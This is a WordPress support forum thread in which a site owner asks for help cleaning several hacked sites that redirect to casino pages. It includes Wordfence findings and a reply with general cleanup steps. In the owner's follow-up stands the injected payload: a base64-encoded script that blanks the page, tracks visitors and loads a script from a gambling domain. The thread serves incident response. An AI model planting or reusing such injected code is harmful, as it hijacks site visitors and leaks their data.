Godaddy hosting with multiple wordpress sites hacked by Casino redirects and inj

  • I am trying to figure out first, what is the vulnerability. I just noticed it a few days ago. when going to https://www.latinodayton.org/coupon (which page does not exists), it brings a site for gambling. I also found a folder with over 8,000 html files in the uploads folder within a folder called https://www.latinodayton.org. The folder(s) have the 0755 and the files 0644 permissions// I also have other sites that in the same hosting and they are all injected with this code. I used Wordfence to detect the files, but I am not sure how to clean them. If I try to delete the lines of code it flags, sometimes the site won’t load. I have the below references so further guidance is appreciated:

    Critical Problems:

    * File appears to be malicious or unsafe: wp-includes/1functions-core.php

    * File appears to be malicious or unsafe: wp-admin/includes/class-wp-site-icon-private.php

    * File appears to be malicious or unsafe: wp-admin/includes/class-theme-upgrader-private.php

    * File appears to be malicious or unsafe: 1wp-config.php

    High Severity Problems:

    * Unknown file in WordPress core: wp-includes/1functions-core.php

    * Unknown file in WordPress core: wp-includes/1vars.php

    * WordPress core file modified: wp-includes/vars.php

    The page I need help with: [log in to see the link]

Viewing 2 replies - 1 through 2 (of 2 total)

  • Dealing with malicious code can be quite a pain. Please take the following steps to proceed and mitigate the issue at hand:

    1. Consider putting the site on maintenance mode. You can use Lightstart WordPress plugin for this. You’ll also minimize the potential harm to your web visitors.
    2. Backup the site: You may want to make a copy just in case you break something accidentally
    3. Isolate all affected sites. You cited you have several. Take some time to assess and analyze the behavior of each site.
    4. Scan the site. You may use a service like Sucuri or WordFence for this (you indicated you already have). Delete what you can. Some hackers insert base64 code into files, therefore at some point you’ll need to check individual files for issues.
      You may want to consider a fresh install of WordPress separately, after which you’ll restore the site content and configurations to the new site
    5. Change stuff: This includes WordPress salts, usernames and passwords (remove what you don’t need)

    Henceforth, you’ll need to follow a security-first approach when designing websites. This includes installing a security plugin like SolidWP and configuring it appropriately.

    Thread Starter mohio

    (@mohio)

    Thanks, Samedi – seems like I have Base64 code. Any guides available to clean them? If I do a fresh install, when doing a backup of the MUST have folders according to WordPress, will any of those have the bad files?

    <script src=”data:text/javascript;base64,bmV3IEltYWdlKCkuc3JjID0gIi8vY291bnRlci55YWRyby5ydS9oaXQ7Y3NuYXVzY2hncHQxMGs/ciIgKyBlc2NhcGUoZG9jdW1lbnQucmVmZXJyZXIpICsgKCh0eXBlb2Yoc2NyZWVuKT09InVuZGVmaW5lZCIpID8gIiI6ICI7cyIgKyBzY3JlZW4ud2lkdGggKyAiKiIgKyBzY3JlZW4uaGVpZ2h0ICsgIioiICsgKHNjcmVlbi5jb2xvckRlcHRoP3NjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5waXhlbERlcHRoKSkgKyAiO3UiICsgZXNjYXBlKGRvY3VtZW50LlVSTCkgKyIgOyIgKyBNYXRoLnJhbmRvbSgpOyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgZnVuY3Rpb24oKSB7IGxldCBib2R5Tm9kZSA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCJib2R5IilbMF07IGlmIChib2R5Tm9kZSkgYm9keU5vZGUucmVtb3ZlKCk7IH0pOyBsZXQgZGR6UVkwRW1jMyA9ICI8c2NyaXB0IHR5cGU9J3RleHQvamF2YXNjcmlwdCcgc3JjPScvL3NjaC1nYW1ibGVyLWxlbmQuY29tL2NzbmVuc2NoLmpzP3JlZj0iICsgZW5jb2RlVVJJKGRvY3VtZW50LlVSTCkgKyAiJnRpdGxlPSIgKyBlbmNvZGVVUkkoZG9jdW1lbnQudGl0bGUpICsgIiZodHRwcmVmPSIgKyBlbmNvZGVVUkkoZG9jdW1lbnQucmVmZXJyZXIpICsgIic+PC9zY3JpcHQ+IjsgZG9jdW1lbnQud3JpdGUoZGR6UVkwRW1jMyk7″></script><meta name=’robots’ content=’max-image-preview:large’ />

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Godaddy hosting with multiple wordpress sites hacked by Casino redirects and inj’ is closed to new replies.